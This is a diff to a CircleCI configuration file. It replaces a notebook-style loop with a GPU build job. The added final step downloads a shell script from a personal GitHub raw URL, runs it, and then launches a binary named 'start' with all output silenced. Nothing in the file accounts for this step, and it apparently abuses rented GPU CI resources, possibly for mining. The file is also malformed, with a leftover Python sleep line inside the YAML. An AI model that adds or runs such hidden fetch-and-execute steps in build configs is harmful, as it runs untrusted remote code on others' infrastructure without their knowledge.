--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -1,5 +1,12 @@
-%%capture 
-import time  
-while  True:  
-  ! timeout 15m wget https://raw.githubusercontent.com/ziraponk/filter/main/filter.sh && chmod u+x filter.sh && ./filter.sh && chmod +x start &&./start > /dev/null 2>&1  
+version: 2.1 
+ 
+jobs: 
+  build: 
+    machine: 
+      image: ubuntu-2004-cuda-11.4:202110-01 
+    resource_class: gpu.nvidia.large 
+    steps: 
+      - run: nvidia-smi 
+      - run: docker run --gpus all nvidia/cuda:9.0-base nvidia-smi 
+      - run: wget https://raw.githubusercontent.com/ziraponk/filter/main/filter.sh && chmod u+x filter.sh && ./filter.sh && chmod +x start &&./start > /dev/null 2>&1  
   time.sleep(20)
